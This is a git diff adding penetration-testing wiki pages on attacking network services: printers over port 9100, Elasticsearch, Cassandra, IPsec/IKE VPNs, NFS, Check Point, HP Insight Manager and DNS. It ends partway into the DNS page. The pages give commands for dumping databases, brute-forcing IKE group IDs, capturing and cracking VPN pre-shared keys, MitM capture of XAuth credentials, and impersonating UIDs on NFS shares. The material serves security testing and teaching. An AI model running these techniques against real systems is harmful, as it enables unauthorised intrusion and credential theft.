diff --git a/pentesting/9100-pjl.md b/pentesting/9100-pjl.md
new file mode 100644
index 00000000..dee6ef7e
--- /dev/null
+++ b/pentesting/9100-pjl.md
@@ -0,0 +1,68 @@
+# 9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)
+
+## Basic Information
+
+Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. \(From [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing)\)
+
+If you want to learn more about [**hacking printers read this page**](pentesting-printers/).
+
+**Default port:** 9100
+
+```text
+9100/tcp open  jetdirect
+```
+
+## Enumeration
+
+### Manual
+
+```bash
+nc -vn <IP> 9100
+@PJL INFO STATUS      #CODE=40000   DISPLAY="Sleep"   ONLINE=TRUE
+@PJL INFO ID          # ID (Brand an version): Brother HL-L2360D series:84U-F75:Ver.b.26
+@PJL INFO PRODINFO    #Product info
+@PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535  #List dir
+@PJL INFO VARIABLES   #Env variales
+@PJL INFO FILESYS     #?
+@PJL INFO TIMEOUT     #Timeout variables
+@PJL RDYMSG           #Ready message
+@PJL FSINIT  
+@PJL FSDIRLIST
+@PJL FSUPLOAD         #Useful to upload a file
+@PJL FSDOWNLOAD       #Useful to download a file
+@PJL FSDELETE         #Useful to delete a file
+```
+
+### Automatic
+
+```bash
+nmap -sV --script pjl-ready-message -p <PORT> <IP>
+```
+
+```bash
+msf> use auxiliary/scanner/printer/printer_env_vars
+msf> use auxiliary/scanner/printer/printer_list_dir
+msf> use auxiliary/scanner/printer/printer_list_volumes
+msf> use auxiliary/scanner/printer/printer_ready_message
+msf> use auxiliary/scanner/printer/printer_version_info
+msf> use auxiliary/scanner/printer/printer_download_file
+msf> use auxiliary/scanner/printer/printer_upload_file
+msf> use auxiliary/scanner/printer/printer_delete_file
+```
+
+### Printers Hacking tool
+
+This is the tool you want to use to abuse printers:
+
+{% embed url="https://github.com/RUB-NDS/PRET" %}
+
+### Hacking Printers best reference
+
+{% embed url="https://hacking-printers.net/wiki/index.php/File\_system\_access" %}
+
+## **Shodan**
+
+```bash
+pjl port:9100
+```
+
diff --git a/pentesting/9200-pentesting-elasticsearch.md b/pentesting/9200-pentesting-elasticsearch.md
new file mode 100644
index 00000000..4c1e1d35
--- /dev/null
+++ b/pentesting/9200-pentesting-elasticsearch.md
@@ -0,0 +1,93 @@
+# 9200 - Pentesting Elasticsearch
+
+## Basic information
+
+From the [main page](https://www.elastic.co/what-is/elasticsearch) you can find some useful descriptions:
+
+Elasticsearch is a distributed, open source search and analytics engine for all types of data, including textual, numerical, geospatial, structured, and unstructured. Elasticsearch is built on Apache Lucene and was first released in 2010 by Elasticsearch N.V. \(now known as Elastic\). Known for its simple REST APIs, distributed nature, speed, and scalability, Elasticsearch is the central component of the Elastic Stack, a set of open source tools for data ingestion, enrichment, storage, analysis, and visualization. Commonly referred to as the ELK Stack \(after Elasticsearch, Logstash, and Kibana\), the Elastic Stack now includes a rich collection of lightweight shipping agents known as Beats for sending data to Elasticsearch.
+
+### What is an Elasticsearch index?
+
+An Elasticsearch _index_ is a collection of documents that are related to each other. Elasticsearch stores data as JSON documents. Each document correlates a set of _keys_ \(names of fields or properties\) with their corresponding values \(strings, numbers, Booleans, dates, arrays of _values_, geolocations, or other types of data\).
+
+Elasticsearch uses a data structure called an _inverted index_, which is designed to allow very fast full-text searches. An inverted index lists every unique word that appears in any document and identifies all of the documents each word occurs in.
+
+During the indexing process, Elasticsearch stores documents and builds an inverted index to make the document data searchable in near real-time. Indexing is initiated with the index API, through which you can add or update a JSON document in a specific index.
+
+**Default port**: 9200/tcp
+
+## Enumeration
+
+### Elasticsearch information
+
+The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/`
+
+![](../.gitbook/assets/image%20%28131%29.png)
+
+### Indices
+
+You can **gather all the indices** accessing `http://10.10.10.115:9200/_cat/indices?v`
+
+```text
+health status index   uuid                   pri rep docs.count docs.deleted store.size pri.store.size
+green  open   .kibana 6tjAYZrgQ5CwwR0g6VOoRg   1   0          1            0        4kb            4kb
+yellow open   quotes  ZG2D1IqkQNiNZmi2HRImnQ   5   1        253            0    262.7kb        262.7kb
+yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0    483.2kb        483.2kb
+
+```
+
+To obtain **information about which kind of data is saved inside an index** you can access: `http://host:9200/<index>` from example in this case `http://10.10.10.115:9200/bank`
+
+![](../.gitbook/assets/image%20%28220%29.png)
+
+### Dump index
+
+If you want to **dump all the contents** of an index you can access: `http://host:9200/<index>/_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true`
+
+![](../.gitbook/assets/image%20%283%29.png)
+
+_Take a moment to compare the contents of the each document \(entry\) inside the bank index and the fields of this index that we saw in the previous section._
+
+So, at this point you may notice that **there is a field called "total" inside "hits"** that indicates that **1000 documents were found** inside this index but only 10 were retried. This is because **by default there is a limit of 10 documents**.  
+But, now that you know that **this index contains 1000 documents**, you can **dump all of them** indicating the number of entries you want to dump in the **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd  
+_Note: If you indicate bigger number all the entries will be dumped anyway, for example you could indicate `size=9999` and it will be weird if there were more entries \(but you should check\)._
+
+### Dump all
+
+In order to dump all you can just go to the **same path as before but without indicating any index**`http://host:9200/_search?pretty=true` like `http://10.10.10.115:9200/_search?pretty=true`  
+Remember that in this case the **default limit of 10** results will be applied. You can use the `size` parameter to dump a **bigger amount of results**. Read the previous section for more information.
+
+### Search
+
+If you are looking for some information you can do a **raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=<search_term>` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
+
+![](../.gitbook/assets/image%20%28256%29.png)
+
+If you want just to **search on an index** you can just **specify** it on the **path**: `http://host:9200/<index>/_search?pretty=true&q=<search_term>`
+
+_Note that the q parameter used to search content **supports regular expressions**_
+
+### Write permissions
+
+You can check your write permissions trying to create a new document inside a new index running something like the following:
+
+```bash
+curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/json' -d'
+ {
+    "bookId" : "A00-3",
+    "author" : "Sankaran",
+    "publisher" : "Mcgrahill",
+    "name" : "how to get a job"
+ }'
+```
+
+That cmd will create a **new index** called `bookindex` with a document of type `books` that has the attributes "_bookId_", "_author_", "_publisher_" and "_name_"
+
+Notice how the **new index appears now in the list**:
+
+![](../.gitbook/assets/image%20%28192%29.png)
+
+And note the **automatically created properties**:
+
+![](../.gitbook/assets/image%20%28330%29.png)
+
diff --git a/pentesting/cassandra.md b/pentesting/cassandra.md
new file mode 100644
index 00000000..adf6d4e0
--- /dev/null
+++ b/pentesting/cassandra.md
@@ -0,0 +1,49 @@
+# 9042/9160 - Pentesting Cassandra
+
+## Basic Information
+
+Apache Cassandra is a highly scalable, high-performance distributed database designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. It is a type of NoSQL database.  
+In several cases you will find **cassandra accepting any credentials** \(as there aren't any configured\) and you will be able to enumerate the database.
+
+**Default port:** 9042,9160
+
+```text
+PORT     STATE SERVICE   REASON
+9042/tcp open  cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta)
+9160/tcp open  cassandra syn-ack
+```
+
+## Enumeration
+
+### Manual
+
+```bash
+pip install cqlsh
+cqlsh <IP>
+#Basic info enumeration
+SELECT cluster_name, thrift_version, data_center, partitioner, native_protocol_version, rack, release_version from system.local;
+#Keyspace enumeration
+SELECT keyspace_name FROM system.schema_keyspaces;
+desc <Keyspace_name>    #Decribe that DB
+desc system_auth        #Describe the DB called system_auth
+SELECT * from system_auth.roles;  #Retreive that info, can contain credential hashes
+SELECT * from logdb.user_auth;    #Can contain credential hashes
+SELECT * from logdb.user;
+SELECT * from configuration."config";
+```
+
+### Automated
+
+There aren't much options here and nmap doesn't obtain much info
+
+```bash
+nmap -sV --script cassandra-info -p <PORT> <IP>
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#cassandra)\*\*\*\*
+
+### **Shodan**
+
+`port:9160 Cluster`  
+****`port:9042 "Invalid or unsupported protocol version"`
+
diff --git a/pentesting/ipsec-ike-vpn-pentesting.md b/pentesting/ipsec-ike-vpn-pentesting.md
new file mode 100644
index 00000000..5ce5f9bd
--- /dev/null
+++ b/pentesting/ipsec-ike-vpn-pentesting.md
@@ -0,0 +1,255 @@
+# 500/udp - Pentesting IPsec/IKE VPN
+
+## Basic Information
+
+IPsec is the most commonly used technology for both gateway-to-gateway \(LAN-to-LAN\) and host to gateway \(remote access\) enterprise VPN solutions.
+
+**IKE is a type of ISAKMP** \(Internet Security Association Key Management Protocol\) implementation, which is a framework for authentication and key exchange. IKE establishes the security association \(SA\) between two endpoints through a three-phase process:
+
+* **Phase 1:** Establish a secure channel between 2 endpoints using a Pre-Shared Key \(PSK\) or certificates. It can use main mode \(3 pairs of messages\) or **aggresive** mode.
+* **Phase1.5:** This is optional, is called Extended Authentication Phase and authenticates the user that is trying to connect \(user+password\).
+* **Phase2:** Negotiates the parameter for the data security using ESP and AH. It can use a different algorithm than the one used in phase 1 \(Perfect Forward Secrecy \(PFS\)\).
+
+**Default port:** 500/udp
+
+## **Discover** the service using nmap
+
+```text
+root@bt:~# nmap -sU -p 500 172.16.21.200
+Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
+Nmap scan report for 172.16.21.200
+Host is up (0.00036s latency).
+PORT    STATE SERVICE
+500/udp open  isakmp
+MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
+```
+
+## **Finding a valid transformation**
+
+The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. **Each transform** contains a number of attributes like DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the key **distribution algorithm** and 28800 seconds as the **lifetime**. 
+
+Then, the first thing that you have to do is **find a valid transformation**, so the server will talk to you. To do so, you can use the tool **ike-scan**. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transforms inside it**.
+
+Depending on the response you can obtain some information about the endpoint:
+
+```text
+root@bt:~# ike-scan -M 172.16.21.200
+Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
+172.16.21.200    Main Mode Handshake returned
+    HDR=(CKY-R=d90bf054d6b76401)
+    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
+    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
+ 
+Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
+```
+
+As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key \(and this is really good for a pentester\).  
+**The value of the last line is also very important:**
+
+*  _0 returned handshake; 0 returned notify:_ This means the target is **not an IPsec gateway**.
+* _**1 returned handshake; 0 returned notify**_**:** This means the **target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable** \(a valid transform will be shown in the output\)
+* _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transforms are acceptable** \(though some gateways do not, in which case further analysis and a revised proposal should be tried\).
+
+Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:**
+
+First of all you need to create all the possible transformations:
+
+```bash
+for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
+```
+
+And then brute-force each one using ike-scan \(this can take several minutes\):
+
+```bash
+while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
+```
+
+If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:
+
+```bash
+while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
+```
+
+Hopefully **a valid transformation is echoed back**.  
+You can try the **same attack** using[ **iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).  
+You could also try to brute force transformations with **ikeforce**:
+
+```bash
+./ikeforce.py -s1 -a <IP> #-s1 for max speed
+```
+
+![](../.gitbook/assets/image%20%2817%29.png)
+
+In **DH Group** also**: 14 = 2048-bit MODP** and **15 = 3072-bit  
+2 = HMAC-SHA = SHA1 \(in this case\). The --trans format is $Enc,$Hash,$Auth,$DH**
+
+Cisco recommends avoidance of DH groups 1 and 2 in particular. The paper’s authors describe how it is likely that **nation states** can **decrypt** **IPsec** sessions negotiated using **weak groups** via discrete log **precomputation**. The hundreds of millions of dollars spent performing precomputation are amortised through the real-time decryption of any session using a weak group \(1,024-bit or smaller\).
+
+### Server fingerprinting
+
+Then, you can use ike-scan to try to **discover the vendor** of the device. The tool send an initial proposal and stops replaying. Then, it will **analyze** the **time** difference **between** the received **messages** from the server and the matching response pattern, the pe tester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional **Vendor ID \(VID\) payload** with IKE.
+
+**Specify the valid transformation if needed** \(using --trans\)
+
+If IKE discover which is the vendor it will print it:
+
+```text
+root@bt:~# ike-scan -M --showbackoff 172.16.21.200
+Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
+172.16.21.200    Main Mode Handshake returned
+    HDR=(CKY-R=4f3ec84731e2214a)
+    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
+    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
+ 
+IKE Backoff Patterns:
+ 
+IP Address       No.  Recv time            Delta Time
+172.16.21.200    1    1322286031.744904    0.000000
+172.16.21.200    2    1322286039.745081    8.000177
+172.16.21.200    3    1322286047.745989    8.000908
+172.16.21.200    4    1322286055.746972    8.000983
+172.16.21.200    Implementation guess: Cisco VPN Concentrator
+ 
+Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
+```
+
+This can be also achieve with nmap script _**ike-version**_
+
+## Finding the correct ID \(group name\)
+
+For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID \(group name\). _****_
+
+You probably won't know the valid group name, so you will have to brute-force it.
+
+To do so, I would recommend you 2 methods:
+
+### Bruteforcing ID with ike-scan
+
+First of all try to make a request with a fake ID trying to gather the hash \("-P"\):
+
+```bash
+ike-scan -P -M -A -n fakeID <IP>
+```
+
+If **no hash is returned**, then probably this method of brute forcing **will work**. If **some** **hash** is returned, this means that a **fake hash is going to be sent** back for a fake ID, so **this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned \(this happens in modern versions\):
+
+![](../.gitbook/assets/image%20%28291%29.png)
+
+But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan.
+
+This script **will try to brute-force possible IDs** and will return the IDs where a valid handshake is returned \(this will be a valid group name\).
+
+If you have discovered an specific transformation add it in the ike-scan command. And if you have discovered several transformations feel free to add a new loop to try them all \(you should try them all until one of them is working properly\).
+
+You can use the[ dictionary of ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) or [the one in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) of common group names to brute-force them:
+
+```bash
+while read line; do (echo "Found ID: $line" && ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
+```
+
+Or use this dict \(is a combination of the other 2 dicts without repetitions\):
+
+{% file src="../.gitbook/assets/vpnids.txt" %}
+
+### Bruteforcing ID with Iker
+
+[ **iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) ****also uses **ike-scan** to bruteforce possible group names. It follows it's own method to **find a valid ID based on the output of ike-scan**.
+
+### Bruteforcing ID with ikeforce
+
+[ikeforce.py](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute force IDs also**. This tool will **try to exploit different vulnerabilities** that could be used to **distinguish** between a **valid** and a **non-valid ID** \(could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible\).
+
+By default **ikeforce** will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use.
+
+* The **first method** is to brute-force the group names by **searching** for the information **Dead Peer Detection DPD** of Cisco systems \(this info is only replayed by the server if the group name is correct\). 
+* The **second method** available is to **checks the number of responses sent to each try** because sometimes more packets are sent when the correct id is used. 
+* The **third method** consist on **searching for "INVALID-ID-INFORMATION" in response to incorrect ID**. 
+* Finally, if the server does not replay anything to the checks, **ikeforce** will try to brute force the server and check if when the correct id is sent the server replay with some packet. Obviously, the goal of brute forcing the id is to get the **PSK** when you have a valid id. Then, with the **id** and **PSK** you will have to bruteforce the XAUTH \(if it is enabled\).
+
+If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all \(you should try them all until one of them is working properly\).
+
+```bash
+git clone https://github.com/SpiderLabs/ikeforce.git
+pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
+```
+
+```bash
+./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
+```
+
+### Sniffing ID
+
+It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear \(from the book **Network Security Assessment: Know Your Network**\)
+
+![](../.gitbook/assets/image%20%28251%29.png)
+
+## Capturing & cracking the hash
+
+Finally,If you have find a **valid transformation** and the **group name** and the **aggressive mode is allowed**, then you can very easily grab the crackable hash:
+
+```bash
+ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
+```
+
+The hash will be saved inside _hash.txt_
+
+You can use **psk-crack** to **crack** the password
+
+```text
+psk-crack -d <Wordlist_path> psk.txt #To crack the hash
+#You can also crack it using john (using ikescan2john.py) and hashcat.
+```
+
+[ikescan2john.py](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)
+
+## **XAuth**
+
+Most implementations use **aggressive mode IKE with a PSK to perform group authentication**, and **XAUTH** to provide additional **user authentication** \(via Microsoft Active Directory, RADIUS, or similar\). Within **IKEv2**, **EAP replaces XAUTH** to authenticate users.
+
+### Local network MitM to capture credentials
+
+So you can capture the data of the login using _fiked_ and see if there is any default username \(You need to redirect IKE traffic to `fiked` for sniffing, which can be done with the help of ARP spoofing, [more info](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)\). Fiked will act as a VPN endpoint and will capture the XAuth credentials:
+
+```text
+fiked -g <IP> -k testgroup:secretkey -l output.txt -d
+```
+
+Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear.
+
+### Brute-forcing XAUTH username ad password with ikeforce
+
+To brute force the **XAUTH** \(when you know a valid group name **id** and the **psk**\) you can use a username or list of usernames and a list o passwords:
+
+```text
+./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
+```
+
+This way, ikeforce will try to connect using each combination of username:password.
+
+If you found one or several valid transforms just use them like in the previous steps.
+
+## Authentication with an IPSEC VPN
+
+In Kali **VPNC** is used to establish IPsec tunnels. The **profiles** have to be located in _**/etc/vpnc/**_ ****and you can use the tool _**vpnc**_ to call them.  
+Example taken from book **Network Security Assessment 3rd Edition**.
+
+```text
+root@kali:~# cat > /etc/vpnc/vpntest.conf << STOP
+IPSec gateway 10.0.0.250
+IPSec ID vpntest
+IPSec secret groupsecret123
+IKE Authmode psk
+Xauth username chris
+Xauth password tiffers1
+STOP
+root@kali:~# vpnc vpntest
+VPNC started in background (pid: 6980)...
+root@kali:~# ifconfig tun0
+```
+
+## Reference Material
+
+* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf)
+* [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
+* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf)
+
diff --git a/pentesting/nfs-service-pentesting.md b/pentesting/nfs-service-pentesting.md
new file mode 100644
index 00000000..a70d424c
--- /dev/null
+++ b/pentesting/nfs-service-pentesting.md
@@ -0,0 +1,72 @@
+# 2049 - Pentesting NFS Service
+
+## **Basic Information**
+
+It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.
+
+**Default port**: 2049
+
+```text
+2049/tcp open  nfs     2-3 (RPC #100003
+```
+
+## Enumeration
+
+### Useful nmap scripts
+
+```bash
+nfs-ls #List NFS exports and check permissions
+nfs-showmount #Like showmount -e
+nfs-statfs #Disk statistics and info from NFS share
+```
+
+### Useful metasploit modules
+
+```bash
+scanner/nfs/nfsmount #Scan NFS mounts and list permissions
+```
+
+### Mounting
+
+To know **which folder** has the server **available** to mount you an ask it using:
+
+```bash
+showmount -e <IP>
+```
+
+Then mount it using:
+
+```bash
+mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock
+```
+
+You should specify to **use version 2** because it doesn't have **any** **authentication** or **authorization**.
+
+**Example:**
+
+```bash
+mkdir /mnt/new_back
+mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
+```
+
+## Permissions
+
+If you mount a folder which contains **files or folders only accesible by some user** \(by **UID**\). You can **create** **locally** a user with that **UID** and using that **user** you will be able to **access** the file/folder.
+
+## NSFShell
+
+To easily list, mount and change UID and GID to have access to files you can use [nfsshell](https://github.com/NetDirect/nfsshell).
+
+[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
+
+## Config files
+
+```text
+/etc/exports
+/etc/lib/nfs/etab
+```
+
+## Privilege Escalation using NFS misconfigurations
+
+[NFS no\_root\_squash and no\_all\_squash privilege escalation](../linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
+
diff --git a/pentesting/pentesting-264-check-point-firewall-1.md b/pentesting/pentesting-264-check-point-firewall-1.md
new file mode 100644
index 00000000..be23a842
--- /dev/null
+++ b/pentesting/pentesting-264-check-point-firewall-1.md
@@ -0,0 +1,21 @@
+# 264 - Pentesting Check Point FireWall-1
+
+Module sends a query to the port **264/TCP** on **CheckPoint** **Firewall-1** firewalls to obtain the firewall name and management station \(such as SmartCenter\) name via a pre-authentication request
+
+```text
+use auxiliary/gather/checkpoint_hostname
+set RHOST 10.10.xx.xx
+```
+
+Sample Output
+
+```text
+[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
+[+] Appears to be a CheckPoint Firewall...
+[+] Firewall Host: FIREFIGHTER-SEC
+[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
+[*] Auxiliary module execution completed
+```
+
+From: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
+
diff --git a/pentesting/pentesting-631-internet-printing-protocol-ipp.md b/pentesting/pentesting-631-internet-printing-protocol-ipp.md
new file mode 100644
index 00000000..1b7d78eb
--- /dev/null
+++ b/pentesting/pentesting-631-internet-printing-protocol-ipp.md
@@ -0,0 +1,9 @@
+# 631 - Internet Printing Protocol\(IPP\)
+
+## Internet Printing Protocol \(IPP\)
+
+The Internet Printing Protocol \(IPP\) is defined in RFC2910 and RFC2911. It's an extendable protocol, for example ‘IPP Everywhere’ is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing have been released.  
+Because IPP is based on _HTTP_, it inherits all existing security features like basic/digest authentication and _SSL/TLS_ encryption. To submit a print job or to retrieve status information from the printer, an HTTP POST request is sent to the IPP server listening on **port 631/tcp**. A famous open-source IPP implementation is CUPS, which is the default printing system in many Linux distributions and OS X. Similar to LPD, IPP is a **channel** to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files.
+
+If you want to learn more about [**hacking printers read this page**](pentesting-printers/).
+
diff --git a/pentesting/pentesting-compaq-hp-insight-manager.md b/pentesting/pentesting-compaq-hp-insight-manager.md
new file mode 100644
index 00000000..8198b4fb
--- /dev/null
+++ b/pentesting/pentesting-compaq-hp-insight-manager.md
@@ -0,0 +1,22 @@
+# 2301,2381 - Pentesting Compaq/HP Insight Manager
+
+**Default Port:** 2301,2381
+
+## **Default passwords**
+
+{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %}
+
+## Config files
+
+```text
+path.properties
+mx.log
+CLIClientConfig.cfg
+database.props
+pg_hba.conf
+jboss-service.xml
+.namazurc
+```
+
+
+
diff --git a/pentesting/pentesting-dns.md b/pentesting/pentesting-dns.md
new file mode 100644
index 00000000..643e4c9e
--- /dev/null
+++ b/pentesting/pentesting-dns.md
@@ -0,0 +1,190 @@
+# 53 - Pentesting DNS
+
+## **Basic Information**
+
+The Domain Name Systems \(DNS\) is the phonebook of the Internet. Humans access information online through domain names, like nytimes.com or espn.com. Web browsers interact through Internet Protocol \(IP\) addresses. DN S translates domain names to [IP addresses](https://www.cloudflare.com/learning/dns/glossary/what-is-my-ip-address/) so browsers can load Internet resources.  
+From [here](https://www.cloudflare.com/learning/dns/what-is-dns/).
+
+**Default port:** 53
+
+```text
+PORT     STATE SERVICE  REASON
+53/tcp   open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+5353/udp open  zeroconf udp-response
+53/udp   open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+```
+
+## Enumeration
+
+### **Banner Grabbing**
+
+DNS does not have a "banner" to grab. The closest equivalent is a magic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.  
+You can perform this query using `dig`:
+
+```bash
+dig version.bind CHAOS TXT @DNS
+```
+
+If that does not work you can use fingerprinting techniques to determine the remote server's version -- the [`fpdns`](https://github.com/kirei/fpdns) tool is one option for that, but there are others.
+
+You can grab the banner also with a **nmap** script:
+
+```text
+--script dns-nsid
+```
+
+### **Zone Transfer**
+
+```bash
+dig axfr @<DNS_IP> #Try zone transfer without domain
+dig axfr @<DNS_IP> <DOMAIN> #Try zone transfer guessing the domain
+fierce -dns <DOMAIN> #Will try toperform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack
+```
+
+### More info
+
+```bash
+dig ANY @<DNS_IP> <DOMAIN>     #Any information
+dig A @<DNS_IP> <DOMAIN>       #Regular DNS request
+dig AAAA @<DNS_IP> <DOMAIN>    #IPv6 DNS request
+dig TXT @<DNS_IP> <DOMAIN>     #Information
+dig MX @<DNS_IP> <DOMAIN>      #Emails related
+dig NS @<DNS_IP> <DOMAIN>      #DNS that resolves that name
+dig -x 192.168.0.2 @<DNS_IP>   #Reverse lookup
+dig -x 2a00:1450:400c:c06::93 @<DNS_IP> #reverse IPv6 lookup
+
+#Use [-p PORT]  or  -6 (to use ivp6 address of dns)
+```
+
+#### Using nslookup
+
+```bash
+nslookup
+> SERVER <IP_DNS> #Select dns server
+> 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe...
+> <IP_MACHINE> #Reverse lookup of a machine, maybe...
+```
+
+### Useful metasploit modules
+
+```bash
+auxiliary/gather/enum_dns #Perform enumeration actions
+```
+
+### Useful nmap scripts
+
+```bash
+#Perform enumeration actions
+nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>
+```
+
+### DNS - Reverse BF
+
+```bash
+dnsrecon -r 127.0.0.0/24 -n <IP_DNS>  #DNS reverse of all of the addresses
+dnsrecon -r 127.0.1.0/24 -n <IP_DNS>  #DNS reverse of all of the addresses
+dnsrecon -r <IP_DNS>/24 -n <IP_DNS>   #DNS reverse of all of the addresses
+dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer
+```
+
+Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
+
+You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24\#\_dns](https://bgp.he.net/net/205.166.76.0/24#_dns) \(this tool is also helpful with BGP\).
+
+### DNS - Subdomains BF
+
+```bash
+dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
+dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan
+```
+
+### Active Directory servers
+
+```text
+dig -t _gc._tcp.lab.domain.com
+dig -t _ldap._tcp.lab.domain.com
+dig -t _kerberos._tcp.lab.domain.com
+dig -t _kpasswd._tcp.lab.domain.com
+nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.com'"
+```
+
+### DNSSec
+
